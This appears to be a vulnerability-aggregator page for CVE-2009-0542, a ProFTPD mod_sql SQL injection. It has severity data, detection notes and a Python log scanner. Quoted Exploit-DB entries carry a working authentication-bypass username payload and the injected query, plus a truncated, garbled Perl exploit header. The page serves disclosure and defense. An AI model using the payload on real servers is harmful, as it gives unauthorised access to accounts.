CVE-2009-0542
Published 2009-02-12
Priority: P266, high, 7.5 (CVSS 2.0)
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 74.73% (99.4th percentile)
SQL injection vulnerability in ProFTPD Server 1.3.1 through 1.3.2rc2 allows remote attackers to execute arbitrary SQL commands via a "%" (percent) character in the username, which introduces a "'" (single quote) character during variable substitution by mod_sql.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | proftpd-dfsg | < proftpd-dfsg 1.3.2-1 (bookworm) | proftpd-dfsg 1.3.2-1 (bookworm) |
| proftpd_project | proftpd | — | — |
| proftpd_project | proftpd | — | — |
| proftpd_project | proftpd | — | — |
Detection & IOCs
- Monitor FTP USER commands containing a literal '%' character in the username field, as this triggers unescaped single-quote injection in mod_sql queries.
- Detect SQL UNION-based injection patterns in FTP login usernames, particularly patterns combining '%') with UNION SELECT targeting uid, gid, homedir, shell columns.
- Inspect MySQL/database query logs for ProFTPD authentication queries containing UNION SELECT or comment sequences (--) originating from the userid field, indicating exploitation.
- Exploitation allows authentication bypass with any password (e.g., '1'); alert on successful FTP logins where the username contains SQL metacharacters such as '%', UNION, or '--'.
- LIMIT clause manipulation in the injected username can be used to authenticate as arbitrary accounts in the users table; monitor for LIMIT keyword in FTP USER strings.
- This vulnerability only affects ProFTPD installations using the mod_sql module for SQL-based authentication; plain file-based authentication is not affected.
- A related but distinct issue (CVE-2009-0543) only affects ProFTPD installs with NLS (National Language Support) enabled; the default ./configure disables NLS, so most standard builds are not affected by CVE-2009-0543.
- The vulnerability is fixed in ProFTPD 1.3.2 (and 1.3.2a packages); only 1.3.1 through 1.3.2rc2 are vulnerable.
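The USER-string checks and the "successful login" correlation from the notes above, as an added example that is not part of the original page or of ProFTPD. The log line format, the `scan` function and the sample lines are assumptions constructed for illustration; adapt the parser to the ExtendedLog or syslog format actually in use.

```python
import re

# Constructed log format (an assumption, not a ProFTPD default):
#   <timestamp> sess=<id> <client-ip> "<FTP command>" <reply-code>
LINE = re.compile(r'^(\S+) sess=(\d+) (\S+) "(\w+) ?(.*)" (\d{3})$')

# Indicators named in the detection notes, matched against the USER argument.
INDICATORS = {
    "percent": re.compile(r"%"),
    "union_select": re.compile(r"\bunion\b.+\bselect\b", re.I),
    "sql_comment": re.compile(r"--"),
    "limit": re.compile(r"\blimit\b", re.I),
}

def scan(lines):
    """Return one finding per suspicious USER command, recording whether the
    same session then received reply 230 (login successful) for its PASS."""
    pending = {}   # session id -> finding still waiting for the PASS result
    findings = []
    for raw in lines:
        m = LINE.match(raw.strip())
        if not m:
            continue
        ts, sess, ip, cmd, arg, code = m.groups()
        cmd = cmd.upper()
        if cmd == "USER":
            pending.pop(sess, None)  # a new USER restarts the login attempt
            hits = sorted(n for n, rx in INDICATORS.items() if rx.search(arg))
            if hits:
                finding = {"time": ts, "client": ip, "user": arg,
                           "indicators": hits, "logged_in": False}
                findings.append(finding)
                pending[sess] = finding
        elif cmd == "PASS" and sess in pending:
            pending.pop(sess)["logged_in"] = (code == "230")
    return findings

# Constructed sample; the second username is the string quoted on this page.
SAMPLE = [
    '2009-02-12T10:00:01 sess=4411 192.0.2.10 "USER alice" 331',
    '2009-02-12T10:00:02 sess=4411 192.0.2.10 "PASS (hidden)" 230',
    '2009-02-12T10:02:11 sess=4412 198.51.100.7 "USER %\') and 1=2 union '
    'select 1,1,uid,gid,homedir,shell from users; --" 331',
    '2009-02-12T10:02:12 sess=4412 198.51.100.7 "PASS (hidden)" 230',
    '2009-02-12T10:05:40 sess=4413 192.0.2.33 "USER 100%real" 331',
    '2009-02-12T10:05:41 sess=4413 192.0.2.33 "PASS (hidden)" 530',
]

if __name__ == "__main__":
    for f in scan(SAMPLE):
        level = "ALERT" if f["logged_in"] else "review"
        print(level, f["time"], f["client"], f["indicators"], repr(f["user"]))
```

A finding with only the `percent` indicator and no successful login is low confidence; the combination of several indicators with `logged_in` set is the case the notes say to alert on.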
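CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| osv | — | 7.5 | HIGH | — |
| vendor_debian | — | 7.5 | MEDIUM | — |
| vendor_redhat | — | 7.5 | HIGH | — |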
GHSA
GHSA-m4rf-c9xj-c2gp: SQL injection vulnerability in ProFTPD Server 1
ghsa_unreviewed·2022-05-02
CVE-2009-0542 [HIGH] CWE-89 GHSA-m4rf-c9xj-c2gp: SQL injection vulnerability in ProFTPD Server 1
OSV
CVE-2009-0542: SQL injection vulnerability in ProFTPD Server 1
osv·2009-02-12·CVSS 7.5
Red Hat
proftpd: SQL injection during login
vendor_redhat·2009-02-10·CVSS 7.5
Debian
CVE-2009-0542: proftpd-dfsg - SQL injection vulnerability in ProFTPD Server 1.3.1 through 1.3.2rc2 allows remo...
vendor_debian·2009·CVSS 7.5
Scope: local
bookworm: resolved (fixed in 1.3.2-1)
bullseye: resolved (fixed in 1.3.2-1)
forky: resolved (fixed in 1.3.2-1)
sid: resolved (fixed in 1.3.2-1)
trixie: resolved (fixed in 1.3.2-1)
No detection rules found.
Exploit-DB
ProFTPd 1.3 - 'mod_sql' 'Username' SQL Injection
exploitdb·2009-02-10
---
source: https://www.securityfocus.com/bid/33722/info
ProFTPD is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to manipulate SQL queries, modify data, or exploit latent vulnerabilities in the underlying database. This may result in unauthorized access and a compromise of the application; other attacks are also possible.
ProFTPD 1.3.1 through 1.3.2 rc 2 are vulnerable.
# Credits Go For gat3way For Finding The Bug ! [AT] http://milw0rm.com/exploits/8037
# Exploited By AlpHaNiX
# HomePage NullArea.Net
# Greetz For Zigma-Djekmani-r1z
use Net::FTP;
if (@ARGV new("$host", Debug => 0) or die "[!] Cannot co
Exploit-DB
ProFTPd - 'mod_mysql' Authentication Bypass
exploitdb·2009-02-10
CVE-2009-0543 ProFTPd - 'mod_mysql' Authentication Bypass
---
Just found out a problem with proftpd's sql authentication. The problem is easily reproducible if you login with username like:
USER %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; --
and a password of "1" (without quotes).
which leads to a successful login. Different account logins can be made successful using the limit clause (e.g. appending "LIMIT 5,1" will make you log in as the 5th account in the users table).
As far as I can see in the mysql logs the query becomes:
SELECT userid, passwd, uid, gid, homedir, shell FROM users WHERE (userid='{UNKNOWN TAG}') and 1=2 union select 1,1,uid,gid,homedir,shell from users limit 1,1; -- ') LIMIT 1
I think the problem lies in the handling of the "%" character (probably that's
- http://bugs.proftpd.org/show_bug.cgi?id=3180
- http://secunia.com/advisories/34268
- http://security.gentoo.org/glsa/glsa-200903-27.xml
- http://www.debian.org/security/2009/dsa-1730
- http://www.mandriva.com/security/advisories?name=MDVSA-2009:061
- http://www.openwall.com/lists/oss-security/2009/02/11/1
- http://www.openwall.com/lists/oss-security/2009/02/11/3
- http://www.openwall.com/lists/oss-security/2009/02/11/5
- http://www.securityfocus.com/archive/1/500823/100/0/threaded
- http://www.securityfocus.com/archive/1/500833/100/0/threaded
- http://www.securityfocus.com/archive/1/500851/100/0/threaded
- http://www.securityfocus.com/archive/1/500852/100/0/threaded
- https://www.exploit-db.com/exploits/8037
2009-02-12
Published